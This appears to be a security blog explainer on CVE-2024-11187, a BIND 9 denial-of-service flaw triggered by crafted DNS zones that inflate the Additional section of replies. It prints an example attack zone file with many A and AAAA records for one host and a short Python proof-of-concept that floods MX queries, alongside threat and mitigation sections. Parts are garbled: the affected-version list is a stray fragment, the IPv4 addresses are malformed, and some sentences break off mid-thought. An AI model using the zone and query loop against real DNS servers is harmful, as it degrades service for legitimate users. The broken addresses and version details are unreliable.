CVE CyberSecurity Database News

CVE-2024-11187 - How Crafted DNS Zones Can Overload BIND 9 Servers (Vulnerability Explained)

Poster -

CVE-2024-11187 is a security vulnerability discovered in multiple versions of the BIND 9 DNS server software, which is widely deployed across the internet for domain name resolution. This issue allows an attacker to deliberately craft DNS zones that trigger BIND to return many records in the Additional section of DNS replies. Sending a flood of such requests can cause authoritative servers or resolvers to consume excessive memory and CPU, leading to degraded performance or even denial of service (DoS).

This vulnerability does not exploit traditional code bugs like buffer overflows, but instead abuses how BIND processes and responds to certain types of DNS queries. The problem is particularly severe when attackers can create zone files (or trick others into using maliciously crafted zones), causing the server's resources to be tied up serving unnecessarily bloated DNS responses.

9.18.11-S1 – 9.18.32-S1**

All users running affected versions should update as soon as patches are available or implement mitigations suggested by the vendors.

The Vulnerability – In Simple Terms

When a DNS query is made, BIND may add extra information in the Additional section of a response—for example, IP addresses that go with referenced hostnames. That’s normal and can save time for DNS clients.

This vulnerability arises when the zone itself is crafted to reference a large number of other names in a way that causes BIND to include dozens, hundreds, or even more records in the Additional section for a single query.

Send repeated queries for records within this zone,

can cause BIND to *work much harder than usual* for each request. This can slow down the server, exhaust memory, or even crash it under heavy load.

Here’s a stripped-down example BIND zone file (not a real attack) showing the general trick

$ORIGIN evilzone.example.
@   IN  SOA    ns.evilzone.example. admin.evilzone.example. ( 1 720 360 120960 360 )
    IN  NS     ns.evilzone.example.

ns  IN  A      192..2.1

; Below, the MX record points to a “mail” host, but the “mail” host has a large number of A and AAAA records
test IN MX 10 mail.evilzone.example.

mail IN A 192..2.10
mail IN A 192..2.11
mail IN A 192..2.12
mail IN A 192..2.13
; ...repeat for hundreds of addresses
mail IN AAAA 2001:db8::1
mail IN AAAA 2001:db8::2
; ...repeat for hundreds of IPv6 addresses

If a resolver queries for the MX record of test.evilzone.example, BIND will add all A and AAAA records for mail.evilzone.example into the Additional section, causing a huge response.

Note: A real attack would use many more records (hundreds or thousands) for maximum amplification.

Proof-of-Concept Exploit (Python)

Let’s see a simplified Python script that triggers this issue on the vulnerable BIND server. (For educational use only! Block evilzone.example in your resolver.)

import dns.resolver

for i in range(100):
    try:
        # Query the MX record for test.evilzone.example to trigger large additional section
        answers = dns.resolver.resolve('test.evilzone.example', 'MX')
        print(f"Response #{i}: Received {len(answers.response.additional)} additional records")
    except Exception as e:
        print(f"Query failed: {e}")

Flooding the server with these requests can consume excessive CPU, memory, and network bandwidth.

Why Is This a Threat?

- Resource Exhaustion: Authoritative servers or open resolvers may run out of memory processing large responses and tracking state.
- Amplification: Attack traffic is much smaller than the server’s responses, so a relatively small request causes a big, expensive reply.
- Denial of Service: High load could either slow down or crash the affected server, disrupting DNS for legitimate users.
- Potential for Reflection Attacks: If the attacker uses spoofed addresses, it could be part of a larger DoS threat.

Mitigation Steps

- Patch: Upgrade BIND as soon as vendor fixes are available (see ISC BIND Security Advisories).
- Limit Additional Section Size: Use BIND options or firewall rules to restrict the size of DNS responses.

References

- Official CVE Record (NVD)
- ISC Security Advisory: CVE-2024-11187
- BIND 9 Release Notes
- BIND Administrator Reference Manual

Summary

CVE-2024-11187 gives attackers a new way to cause trouble not by hacking your code, but by fooling BIND 9 into doing much more work than necessary. It’s a reminder to keep DNS servers up-to-date and to be careful about what zones you trust and serve.

Stay vigilant—patch BIND, watch your DNS logs, and restrict unknown or untrusted zones!

Exclusively written for your safety awareness: Don’t forget to subscribe for more actionable security deep-dives.

Timeline

Published on: 01/29/2025 22:15:28 UTC